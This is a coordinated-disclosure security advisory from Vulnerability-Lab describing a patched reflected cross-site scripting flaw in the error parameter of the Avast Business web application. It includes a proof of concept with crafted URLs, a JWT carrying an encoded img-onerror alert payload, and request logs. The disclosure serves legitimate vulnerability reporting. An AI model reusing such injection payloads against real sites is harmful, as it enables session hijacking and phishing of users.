Document Title: =============== AVAST Business #14 - Client Side Cross Site Vulnerability Date: ===== 2016-05-22 References: =========== http://www.vulnerability-lab.com/get_content.php?id=1624 VL-ID: ===== 1624 Common Vulnerability Scoring System: ==================================== 3.3 Introduction: ============= Avast security software products are developed for Microsoft Windows, Mac OS X, Android and Linux users by AVAST Software s.r.o., a Czech private limited company. Avast was founded in 1988, and is headquartered in Prague, Czech Republic. It produces antivirus and security programs for personal and commercial use. In January 2015, Avast had 21.4% of the worldwide security vendor market share. As of March 2015, Avast had 233 million users of its products and services worldwide. According to a company press release, Avast protects more than 30 percent of the consumer PCs in the world outside of China. The software products have a user interface available in 45 languages. Avast has 500 employees; 90 percent of whom work in the Czech Republic. Avast has 13 offices in Prague, Brno, Germany, China, South Korea, Taiwan & U.S. (Copy of the Homepage: https://en.wikipedia.org/wiki/Avast_%28software_company%29 ) Abstract: ========= An independent vulnerability laboratory researcher discovered a client-side cross site scripting web vulnerability in the official Avast Business online service web-application. Report-Timeline: ================ 2015-10-27: Researcher Notification & Coordination (Kieran Claessens) 2015-10-27: Vendor Notification (AVAST Security Team - Bug Bounty Program) 2015-11-02: Vendor Response/Feedback (AVAST Security Team - Bug Bounty Program) 2015-11-24: Vendor Fix/Patch (AVAST Developer Team) 2016-05-23: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== AVAST! Product: Business - Online Service (Web-Application) v2015 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A client-side cross site scripting web vulnerability has been discovered in the official Avast Business online service web-application. The client-side vulnerability allows remote attacker to inject script codes to compromise client-side browser to application requests. The vulnerability is located in the `error` parameter of the exception-handling in the avast business online-service web-application. Remote attackers are able to inject script code to manipulate client-side GET methods request to the avast business website. The injetction point is the error value of the exception and the execution of the injected script code occurs in the error message context. The attack vector of the vulnerability is client-side and the request method to inject or execute is GET. The security risk of the client-side cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the client-side cross site scripting web vulnerability requires no privilege web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing, non-persistent external redirects, non-persistent load of malicous script codes or client-side manipulation of affected or connected modules. Request Method(s): [+] GET Vulnerable Module(s): [+] Avast - Business Vulnerable Parameter(s): [+] #error Affected Module(s): [+] Error - Exception Handling (Web-Server) Proof of Concept: ================= The client-side cross site vulnerability can be exploited by remote attackers without privileged web-application user account and with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Link (Intercepted): https://support.business.avast.com/access/jwtjwt=eyJhbGciOiJIUzI1NiJ9.eyJyZW1vdGVfcGhvdG9fdXJsIjoiaHR0cHM 6XC9cL2lkLmF2YXN0LmNvbVwvYXZ0XC8wMTQwZTMzMTMyZWE0YjEzMTNmMGQxNGM0ODU1Yzc3OWJlNThlZjdiNmY1YjE0NDVkODc5Y2MwM jQ1NzMxOGY2IiwidXNlcl9maWVsZHMiOnsibnVtYmVyX29mX2RldmljZXMiOjAsInB1cmNoYXNlZF9zdXBwb3J0IjpmYWxzZSwiY291bnR yeSI6IkJlbGdpdW0iLCJ3ZWJzaXRlIjoiaHR0cDpcL1wvd3d3Lmdvb2dsZS5jb20iLCJhZGRyZXNzIjoiXCI-PGltZyBzcmM9XCJYXCIgb 25lcnJvcj1cImFsZXJ0KDEpXCIXG5cIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj5cbjkwMDAiLCJwdXJjaGFzZWRfc2V jdXJlbGluZSI6ZmFsc2UsImluZHVzdHJ5IjoiQ09OU1VMVEFOQ1kiLCJwcmVtaXVtX3N1YnNjcmlwdGlvbiI6ZmFsc2UsInB1cmNoYXNlZF9pb nN0YWxsYXRpb24iOmZhbHNlLCJudW1iZXJfb2ZfZW1wbG95ZWVzIjoiMSAtIDUiLCJwaG9uZSI6IjEzMDAyOTkxMTEiLCJjb21wYW55X25hbWUiOiJCaX RzZWNcIj48aW1nIHNyYz1cIlhcIiBvbmVycm9yPVwiYWxlcnQoMSlcIj4ifSwibmFtZSI6InNlY3VyaXR5QGtpZXJhbmNsYWVzc2Vucy5iZSIsI mV4dGVybmFsX2lkIjoiT3BRcV9xdkZTeW1fVDNiNjVsS3lmZzlFUU5EeHYwY1ZqM3BQZjVIZV9vSSIsImlhdCI6MTQ0NTY5MTQ4MSwiZW1haWwiOiJzZWN1cm l0eUBraWVyYW5jbGFlc3NlbnMuYmUiLCJqdGkiOiIwZjc4NmI2OS03MWE4LTRlMmUtOGIzOS05NjVhNDVmYTZjODcifQ.CDST0tmNRXkc4N7zxJ6wHZ31WCyasEMdabYjeBNhv98 Link (Error Redirect) https://business.avast.com/public/#error/911/Invalid%20iat%20parameter.%20The%20supplied%20iat%20value%20is%20more%20than%203%20minutes%20off,%20check%20your%20server%20clock. Link PoC: https://business.avast.com/public/#error/911/letsxssthis"> https://business.avast.com/public/#error/911/letsxssthis"> --- PoC Session Logs [GET] --- Status: 200[OK] GET https://business.avast.com/public/K Load Flags[LOAD_NORMAL] Größe des Inhalts[-1] Mime Type[text/html] Request Header: Host[business.avast.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0] Accept[image/png,image/*;q=0.8,*/*;q=0.5] Accept-Language[de,en-US;q=0.7,en;q=0.3] Accept-Encoding[gzip, deflate] Referer[https://business.avast.com/public/] Cookie[_ga=GA1.3.1707638216.1445943077; _gat_UA-58120669-2=1] Connection[keep-alive] Response Header: Server[nginx/1.6.2] Date[Tue, 27 Oct 2015 10:53:31 GMT] Content-Type[text/html] Transfer-Encoding[chunked] Connection[keep-alive] X-Frame-Options[SAMEORIGIN] x-content-type-options[nosniff] Strict-Transport-Security[max-age=31536000; includeSubdomains;] X-XSS-Protection[1; mode=block] Content-Encoding[gzip] Reference(s): https://business.avast.com/ https://business.avast.com/public/ https://business.avast.com/public/#error/ Risk: ===== The security risk of the client-side cross site scripting web vulnerability in the avast business web-application is estimated as medium. (CVSS 3.3) Credits: ======== Kieran Claessens - [http://www.vulnerability-lab.com/show.php?user=Kieran%20Claessens] Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission. Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™